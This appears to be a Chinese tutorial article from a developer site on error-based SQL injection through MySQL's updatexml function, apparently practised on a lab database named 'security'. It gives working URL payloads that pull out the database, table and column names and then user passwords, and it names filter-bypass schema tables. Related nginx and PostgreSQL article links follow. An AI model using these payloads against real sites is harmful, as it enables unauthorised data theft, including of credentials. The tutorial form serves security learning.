SQL报错注入之updatexml的实现_MsSqlserver

1.updatexml报错原理

updatexml(xml_doument,xpath_string,new_value)
第一个参数：xml的内容
第二个参数：是需要update的位置xpath路径
第三个参数：是更新后的内容
所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合xpath格式，当我们输入一个不符合xpath语法的语句就报错了，我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

根据结果可以判断出存在数字型注入，并且页面会打印出报错信息，所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符号，所以数据库名为security

3.2爆表名

mysql 中的 information_schema 这个库就像时mysql的信息数据库，他保存着mysql 服务器所维护的所有其他的数据库信息，包括了库名，表名，列名。

在注入时，information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉，还可以尝试使用下述库来代替

sys.schema_auto_increment_columns

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根据结果可知当前security库下有四张表，并且users表最有可能存放用户信息

3.3爆字段名

我们通过sql语句查询知道当前数据库有四个表，根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

根据结果可以判断出字段名不全，这是因为updataxml函数只显示32位，所以我们可以用substr函数来慢慢截取来获得所有的字段名

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢？

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查询直接就爆出users表的列名，可以得到两个敏感字段就是username和password，最有可能存放用户的账号密码

3.4爆数据

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml报错注入就结束啦！

到此这篇关于sql报错注入之updatexml的实现的文章就介绍到这了,更多相关sql updatexml内容请搜索代码网以前的文章或继续浏览下面的相关文章希望大家以后多多支持代码网！

服务器部署之虚拟机安装nginx并部署web网页

1、先上成品图2、安装nginx运行所需插件：gcc：gcc编译器用于编译编程语言。//通过gcc -v查看版本，如果有就不管【centos7是有的】gcc -v//如果没有gcc…

2024年10月22日 • 数据库

配置nginx转发内网请求到外网的实现示例

一、要干什么事情因工作需要对接，需要在内网获取外网的接口的数据。但是因为网络管理的需要，内网不能直接暴露到公网环境中，因此采取的方案是：step1：内网的服务器n上发起了一个请求s…

2024年10月22日 • 数据库

详解如何设置Nginx实现内外网端口映射

在 nginx 中实现内外网端口映射是一种常见的做法，通常用于将内部网络中的服务通过 nginx 反向代理到外部网络，使外部用户能够访问这些服务。下面将详细介绍... [阅读全文]

Nginx使用mirror指令实现接口复制

在nginx中，使用mirro指令可以方便地实现接口请求的复制。这个功能非常适合用于流量监控、数据收集或负载均衡。以下是一个具体示例，展示如何配置nginx以实... [阅读全文]

详解Prometheus 抓取 nginx 访问日志的指标

要通过 prometheus 的 nginx exporter 来抓取 nginx 中的日志信息，例如状态码为 4xx 或 5xx 的日志，需要结合以下几种工具... [阅读全文]

PostgreSQL时间相差天数实例例子代码解析

代码示例：在postgresql中，计算两个日期或时间戳之间的差异可以使用多种方法。以下是一些常见的例子：1. 计算两个日期之间的天数差异假设有两个日期，dat... [阅读全文]


验证码：

验证码：

SQL报错注入之updatexml的实现

2024年10月30日 • MsSqlserver •我要评论